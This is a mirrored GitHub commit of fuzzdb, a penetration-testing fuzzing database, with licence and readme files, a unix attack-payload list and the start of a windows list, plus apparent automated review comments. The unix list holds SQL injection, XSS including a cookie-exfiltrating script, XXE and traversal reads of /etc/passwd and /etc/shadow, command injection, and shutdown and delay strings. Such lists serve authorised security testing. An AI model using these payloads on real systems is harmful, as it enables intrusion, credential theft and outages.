mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-10 05:24:12 +00:00
push all
commit
6bd1a2434a
138 changed files with 269525 additions and 0 deletions
33
_copyright.txt
Normal file
|
@ -0,0 +1,33 @@
|
|||
Copyright (c) 2010, Adam Muntner
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
|
||||
|
||||
Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
|
||||
Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
|
||||
Neither the name of fuzzdb nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
|
||||
Licensed under Creative Commons - By Attribution
|
||||
|
||||
see
|
||||
|
||||
http://creativecommons.org/licenses/by/3.0/legalcode
|
||||
|
||||
----
|
||||
|
||||
contains dictionaries from Skipfish
|
||||
Copyright 2010 Michal Zalewski
|
||||
|
||||
Licensed under the Apache License, Version 2.0 (the "License");
|
||||
you may not use this file except in compliance with the License.
|
||||
You may obtain a copy of the License at
|
||||
|
||||
http://www.apache.org/licenses/LICENSE-2.0
|
||||
|
||||
Unless required by applicable law or agreed to in writing, software
|
||||
distributed under the License is distributed on an "AS IS" BASIS,
|
||||
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
See the License for the specific language governing permissions and
|
||||
limitations under the License.
|
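Review bot: the licence terms at the top of `_copyright.txt` conflict. The file opens with a BSD-style grant ("Redistribution and use in source and binary forms ...") and then states "Licensed under Creative Commons - By Attribution", with nothing saying which terms cover which files. State one licence for the fuzzdb lists, or scope each grant to the files it covers. The Skipfish section has the same gap: it says the project "contains dictionaries from Skipfish" without naming them, so a downstream user cannot tell which files fall under the Apache License, Version 2.0. Listing those paths here would fix that.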
49
_readme.txt
Normal file
|
@ -0,0 +1,49 @@
|
|||
fuzzdb: Web Fuzzing Discovery and Attack Pattern Database
|
||||
adam muntner [unix23 (at) gmail . com]
|
||||
|
||||
Introduction
|
||||
|
||||
Too much new software is vulnerable to the attack sequences of yesteryear. This suggests a testing approach: a comprehensive set of known attack pattern sequences can be leveraged for use in targeted fuzzing when testing for exploitable conditions in new applications.
|
||||
|
||||
This is especially useful for many filter bypass type exploits. Identical encoding sequences have been observed to bypass filters for more than one application. Examples can be observed in categories including xss, sqli, evil script upload, OS command execution, traversal issues, directory indexing bugs, source code revealing vulnerabilities, etc. In recent times, for example, new embedded webservers were discovered to be vulnerable to directory traversal issues triggered by encodings that exploited Microsoft IIS in 2000.
|
||||
|
||||
This approach is also useful for targeted use of brute force for discovery using, for example, lists of known vulnerable scripts sorted by platform type, default locations of critical files of popular apps, high quality lists of common directory names.
|
||||
|
||||
Primary sources used for attack pattern research:
|
||||
|
||||
-researching old web exploits for repeatable attack strings
|
||||
-scraping scanner patterns from my own http logs
|
||||
-various books, articles, blog posts
|
||||
-documentation for popular applications
|
||||
-metasploit wmap http://www.metasploit.com/redmine/projects/framework/wiki/WMAP
|
||||
-dirb http://www.open-labs.org/
|
||||
-jbrofuzz http://www.owasp.org/index.php/Category:OWASP_JBroFuzz
|
||||
-skipfish http://code.google.com/p/skipfish/
|
||||
-rsnake's xss and rfi files http://ha.ckers.org/
|
||||
-michael daw's web shell archive http://michaeldaw.org/
|
||||
-joseph giron (joseph.giron13 (at) gmail.com)
|
||||
-analysis of default app installs
|
||||
-lists already submitted to OWASP Fuzzing Code DB by Wagner Elias, Eduardo Neves, Ulisses Castro, Adam Muntner http://www.owasp.org/index.php/Category:OWASP_Fuzzing_Code_Database#tab=News
|
||||
-Some files are derived primarily from other fuzzers, and are credited in the files with comments formatted like:
|
||||
|
||||
# This file is primarily derived from source xyz
|
||||
|
||||
Others have additional instructions for payload use in a similar comment format at the top of the file
|
||||
|
||||
Download
|
||||
|
||||
Check out via svn:
|
||||
|
||||
svn checkout http://fuzzdb.googlecode.com/svn/trunk/ fuzzdb-read-only
|
||||
|
||||
Or, pick from a plethora of available svn clients: http://en.wikipedia.org/wiki/Comparison_of_Subversion_clients
|
||||
|
||||
Tarballs are available for download, but may not be as fresh as what's in the svn repo.
|
||||
|
||||
Browse the repo http://code.google.com/p/fuzzdb/source/browse/#svn/trunk
|
||||
|
||||
Who
|
||||
|
||||
This SVN repository and the files were assembled by Adam Muntner (unix23 @ gmail.com) He is the Managing Partner of QuietMove, Inc. http://www.quietmove.com - a firm that specializes in web application penetration testing and developer training.
|
||||
|
||||
|
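Review bot: in the Download section the checkout command uses a plain `http://` URL and the readme mentions no checksum for the tarballs, so nothing authenticates what a user pulls before loading it into a scanner. Suggest publishing hashes for the tarballs and giving an https checkout URL if the host offers one. Two documentation points in the same hunk: the readme says credits and usage instructions live in `#` comments at the top of each file but does not say how a consumer should tell those from list entries that themselves begin with `#`, and the Who paragraph is missing the full stop after "(unix23 @ gmail.com)".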
512
attack-payloads/all-attacks/all-attacks-unix.txt
Normal file
|
@ -0,0 +1,512 @@
|
|||
# a wide sample of malicious input for unix-like targets
|
||||
!
|
||||
!'
|
||||
!@#$%%^#$%#$@#$%$$@#$%^^**(()
|
||||
!@#0%^#0##018387@#0^^**(()
|
||||
"
|
||||
" or "a"="a
|
||||
" or "x"="x
|
||||
" or 0=0 #
|
||||
" or 0=0 --
|
||||
" or 1=1 or ""="
|
||||
" or 1=1--
|
||||
"' or 1 --'"
|
||||
") or ("a"="a
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
|
||||
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
|
||||
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
|
||||
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
|
||||
"><script>"
|
||||
"><script>alert(1)</script>
|
||||
"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>
|
||||
">xxx<P>yyy
|
||||
"\t"
|
||||
#
|
||||
#'
|
||||
#'
|
||||
#xA
|
||||
#xA#xD
|
||||
#xD
|
||||
#xD#xA
|
||||
$NULL
|
||||
$null
|
||||
%
|
||||
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
|
||||
%00
|
||||
%00../../../../../../etc/passwd
|
||||
%00../../../../../../etc/shadow
|
||||
%00/
|
||||
%00/etc/passwd%00
|
||||
%01%02%03%04%0a%0d%0aADSF
|
||||
%08x
|
||||
%0A/usr/bin/id
|
||||
%0A/usr/bin/id%0A
|
||||
%0Aid
|
||||
%0Aid%0A
|
||||
%0a ping -i 30 127.0.0.1 %0a
|
||||
%oa ping -n 30 127.0.0.1 %0a
|
||||
%0a id %0a
|
||||
%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a
|
||||
%0d
|
||||
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
|
||||
%0d%0aX-Injection-Header:%20AttackValue
|
||||
%20
|
||||
%20$(sleep%2050)
|
||||
%20'sleep%2050'
|
||||
%20d
|
||||
%20n
|
||||
%20s
|
||||
%20x
|
||||
%20|
|
||||
%21
|
||||
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
||||
%2500
|
||||
%250a
|
||||
%26
|
||||
%27%20or%201=1
|
||||
%28
|
||||
%29
|
||||
%2A
|
||||
%2A%28%7C%28mail%3D%2A%29%29
|
||||
%2A%28%7C%28objectclass%3D%2A%29%29
|
||||
%2A%7C
|
||||
%2C
|
||||
%2e%2e%2f
|
||||
%3C
|
||||
%3C%3F
|
||||
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
|
||||
%3cscript%3ealert("XSS");%3c/script%3e
|
||||
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
|
||||
%5C
|
||||
%5C/
|
||||
%60
|
||||
%7C
|
||||
%7f
|
||||
%99999999999s
|
||||
%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
|
||||
%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
|
||||
%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
|
||||
%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
|
||||
%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
|
||||
%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
|
||||
%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
|
||||
%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
|
||||
%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
|
||||
%ff
|
||||
%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
|
||||
%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
|
||||
%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
|
||||
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
|
||||
%s%p%x%d
|
||||
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
|
||||
%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
|
||||
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
|
||||
&
|
||||
& id
|
||||
& ping -i 30 127.0.0.1 &
|
||||
& ping -n 30 127.0.0.1 &
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
|
||||
|
||||
|
||||
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
'
|
||||
'%20OR
|
||||
&id
|
||||
<
|
||||
<
|
||||
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
|
||||
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
|
||||
<!--#exec%20cmd="/usr/bin/id;-->
|
||||
<>"'%;)(&+
|
||||
<script>alert(document.cookie);<script>alert
|
||||
<script>alert(document.cookie);</script>
|
||||
";id"
|
||||
'
|
||||
' (select top 1
|
||||
' --
|
||||
' ;
|
||||
' UNION ALL SELECT
|
||||
' UNION SELECT
|
||||
' or ''='
|
||||
' or '1'='1
|
||||
' or '1'='1'--
|
||||
' or 'x'='x
|
||||
' or (EXISTS)
|
||||
' or 0=0 #
|
||||
' or 0=0 --
|
||||
' or 1 in (@@version)--
|
||||
' or 1=1 or ''='
|
||||
' or 1=1--
|
||||
' or a=a--
|
||||
' or uid like '%
|
||||
' or uname like '%
|
||||
' or user like '%
|
||||
' or userid like '%
|
||||
' or username like '%
|
||||
'%20or%201=1
|
||||
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
|
||||
'';!--"<XSS>=&{()}
|
||||
') or ('a'='a
|
||||
'--
|
||||
'; exec master..xp_cmdshell
|
||||
'; exec xp_regread
|
||||
'; waitfor delay '0:30:0'--
|
||||
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
|
||||
';shutdown--
|
||||
'><script>alert(document.cookie);</script>
|
||||
'><script>alert(document.cookie)</script>
|
||||
'hi' or 'x'='x';
|
||||
'or select *
|
||||
'sqlattempt1
|
||||
'||UTL_HTTP.REQUEST
|
||||
'||Utl_Http.request('http://<yourservername>') from dual--
|
||||
(
|
||||
(')
|
||||
(sqlattempt2)
|
||||
)
|
||||
))))))))))
|
||||
*
|
||||
*'
|
||||
*'
|
||||
*(|(mail=*))
|
||||
*(|(objectclass=*))
|
||||
*/*
|
||||
*|
|
||||
+
|
||||
+%00
|
||||
,@variable
|
||||
-
|
||||
--
|
||||
--';
|
||||
--sp_password
|
||||
-1
|
||||
-1.0
|
||||
-2
|
||||
-20
|
||||
-268435455
|
||||
..%%35%63
|
||||
..%%35c
|
||||
..%25%35%63
|
||||
..%255c
|
||||
..%5c
|
||||
..%bg%qf
|
||||
..%c0%af
|
||||
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
|
||||
..%u2215
|
||||
..%u2216
|
||||
../
|
||||
../../../../../../../../../../../../etc/hosts
|
||||
../../../../../../../../../../../../etc/hosts%00
|
||||
../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../etc/shadow
|
||||
../../../../../../../../../../../../etc/shadow%00
|
||||
..\
|
||||
..\..\..\..\..\..\..\..\..\..\etc\passwd
|
||||
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
||||
..\..\..\..\..\..\..\..\..\..\etc\shadow
|
||||
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
||||
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
|
||||
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
|
||||
/
|
||||
/%00/
|
||||
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
||||
/%2A
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
|
||||
/'
|
||||
/'
|
||||
/,%ENV,/
|
||||
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
|
||||
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
|
||||
/.../.../.../.../.../
|
||||
/../../../../../../../../%2A
|
||||
/../../../../../../../../../../../etc/passwd%00.html
|
||||
/../../../../../../../../../../../etc/passwd%00.jpg
|
||||
/../../../../../../../../../../etc/passwd
|
||||
/../../../../../../../../../../etc/passwd^^
|
||||
/../../../../../../../../../../etc/shadow
|
||||
/../../../../../../../../../../etc/shadow^^
|
||||
/../../../../../../../../bin/id|
|
||||
/..\../..\../..\../..\../..\../..\../boot.ini
|
||||
/..\../..\../..\../..\../..\../..\../etc/passwd
|
||||
/..\../..\../..\../..\../..\../..\../etc/shadow
|
||||
/./././././././././././etc/passwd
|
||||
/./././././././././././etc/shadow
|
||||
//
|
||||
//*
|
||||
/etc/passwd
|
||||
/etc/shadow
|
||||
/index.html|id|
|
||||
0
|
||||
0 or 1=1
|
||||
00
|
||||
0xfffffff
|
||||
1
|
||||
1 or 1 in (@@version)--
|
||||
1 or 1=1--
|
||||
1.0
|
||||
1; waitfor delay '0:30:0'--
|
||||
1;SELECT%20*
|
||||
1||Utl_Http.request('http://<yourservername>') from dual--
|
||||
2
|
||||
2147483647
|
||||
268435455
|
||||
65536
|
||||
:response.write 111111
|
||||
;
|
||||
; ping 127.0.0.1 ;
|
||||
;/usr/bin/id\n
|
||||
;echo 111111
|
||||
;id
|
||||
;id;
|
||||
;id\n
|
||||
;id|
|
||||
;ls -la
|
||||
;system('/usr/bin/id')
|
||||
;system('cat%20/etc/passwd')
|
||||
;system('id')
|
||||
;|/usr/bin/id|
|
||||
<
|
||||
< script > < / script>
|
||||
<!
|
||||
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
|
||||
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
|
||||
</foo>
|
||||
<<
|
||||
<<<
|
||||
<<script>alert("XSS");//<</script>
|
||||
<>"'%;)(&+
|
||||
<?
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
|
||||
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
|
||||
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
||||
<IMG DYNSRC="javascript:alert('XSS')">
|
||||
<IMG LOWSRC="javascript:alert('XSS')">
|
||||
<IMG SRC="  javascript:alert('XSS');">
|
||||
<IMG SRC="jav ascript:alert('XSS');">
|
||||
<IMG SRC="jav	ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
<IMG SRC="javascript:alert('XSS');">
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||
<IMG SRC=`javascript:alert("'XSS'")`>
|
||||
<IMG SRC=javascript:alert("XSS")>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
|
||||
<IMG%20SRC='javasc ript:alert(document.cookie)'>
|
||||
<IMG%20SRC='javascript:alert(document.cookie)'>
|
||||
<foo></foo>
|
||||
<name>','')); phpinfo(); exit;/*</name>
|
||||
<script>alert("XSS")</script>
|
||||
<script>alert(document.cookie)</script>
|
||||
<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
|
||||
<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||
<xss><script>alert('XSS')</script></vulnerable>
|
||||
<youremail>%0aBcc:<youremail>
|
||||
<youremail>%0aCc:<youremail>
|
||||
<youremail>%0d%0aBcc:<youremail>
|
||||
<youremail>%0d%0aCc:<youremail>
|
||||
=
|
||||
='
|
||||
=--
|
||||
=;
|
||||
>
|
||||
?x=
|
||||
?x="
|
||||
?x=>
|
||||
?x=|
|
||||
@'
|
||||
@'
|
||||
@*
|
||||
@variable
|
||||
A
|
||||
ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
|
||||
FALSE
|
||||
NULL
|
||||
PRINT
|
||||
PRINT @@variable
|
||||
TRUE
|
||||
XXXXX.%p
|
||||
XXXXX`perl -e 'print ".%p" x 80'`
|
||||
[']
|
||||
[']
|
||||
\
|
||||
\";alert('XSS');//
|
||||
\"blah
|
||||
\'
|
||||
\'
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\passwd
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\shadow
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
||||
\0
|
||||
\00
|
||||
\00\00
|
||||
\00\00\00
|
||||
\0\0
|
||||
\0\0\0
|
||||
\\
|
||||
\\'/bin/cat%20/etc/passwd\\'
|
||||
\\'/bin/cat%20/etc/shadow\\'
|
||||
\\/
|
||||
\\\\*
|
||||
\\\\?\\
|
||||
\n/bin/ls -al\n
|
||||
\n/usr/bin/id;
|
||||
\n/usr/bin/id\n
|
||||
\n/usr/bin/id|
|
||||
\nid;
|
||||
\nid\n
|
||||
\nid|
|
||||
\nnetstat -a%\n
|
||||
\t
|
||||
\u003C
|
||||
\u003c
|
||||
\x23
|
||||
\x27
|
||||
\x27UNION SELECT
|
||||
\x27\x4F\x52 SELECT *
|
||||
\x27\x6F\x72 SELECT *
|
||||
\x3C
|
||||
\x3D \x27
|
||||
\x3D \x3B'
|
||||
\x3c
|
||||
^'
|
||||
^'
|
||||
`
|
||||
`/usr/bin/id`
|
||||
`dir`
|
||||
`id`
|
||||
`perl -e 'print ".%p" x 80'`%n
|
||||
`ping 127.0.0.1`
|
||||
a);/usr/bin/id
|
||||
a);/usr/bin/id;
|
||||
a);/usr/bin/id|
|
||||
a);id
|
||||
a);id;
|
||||
a);id|
|
||||
a)|/usr/bin/id
|
||||
a)|/usr/bin/id;
|
||||
a)|id
|
||||
a)|id;
|
||||
a;/usr/bin/id
|
||||
a;/usr/bin/id;
|
||||
a;/usr/bin/id|
|
||||
a;id
|
||||
a;id;
|
||||
a;id|
|
||||
http://<yourservername>/
|
||||
id%00
|
||||
id%00|
|
||||
insert
|
||||
like
|
||||
limit
|
||||
null
|
||||
or
|
||||
or 0=0 #
|
||||
or 0=0 --
|
||||
or 1=1--
|
||||
or%201=1
|
||||
or%201=1 --
|
||||
response.write 111111
|
||||
something%00html
|
||||
update
|
||||
x' or 1=1 or 'x'='y
|
||||
x' or name()='username' or 'x'='y
|
||||
xsstest
|
||||
xsstest%00"<>'
|
||||
{'}
|
||||
|/usr/bin/id
|
||||
|/usr/bin/id|
|
||||
|id
|
||||
|id;
|
||||
|id|
|
||||
|ls
|
||||
|ls -la
|
||||
|nid\n
|
||||
|usr/bin/id\n
|
||||
||
|
||||
|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
|
||||
||/usr/bin/id;
|
||||
||/usr/bin/id|
|
||||
}
|
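Review bot: the first line uses `#` as a comment marker, but the list also has entries that begin with `#` (`#`, `#'`, `#xA`, `#xD`), so a consumer that strips comment lines drops real entries and one that does not sends the header as a test string. Document the convention, for example that only the leading comment block is metadata. Also in this hunk: `%oa ping -n 30 127.0.0.1 %0a` looks like a typo for `%0a`; two of the `%25%5c..` lines contain a literal space in `..% 25%5c..`; several entries appear more than once as rendered here (`#'`, `/'`, `<>"'%;)(&+`); and a file labelled for unix-like targets carries Windows-only entries such as `boot.ini`, `ping -n` and `xp_cmdshell`. Entries that can take a service down (`';shutdown--`, the `file:////dev/random` entity, the 30-minute `waitfor delay`) would be safer in a separately named file so that an authorised tester opts into them deliberately.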
531
attack-payloads/all-attacks/all-attacks-win.txt
Normal file
|
@ -0,0 +1,531 @@
|
|||
# a wide sample of malicious input for windows targets
|
||||
A
|
||||
TRUE
|
||||
FALSE
|
||||
0
|
||||
00
|
||||
1
|
||||
-1
|
||||
1.0
|
||||
-1.0
|
||||
2
|
||||
-2
|
||||
-20
|
||||
65536
|
||||
268435455
|
||||
-268435455
|
||||
2147483647
|
||||
0xfffffff
|
||||
NULL
|
||||
null
|
||||
\0
|
||||
\00
|
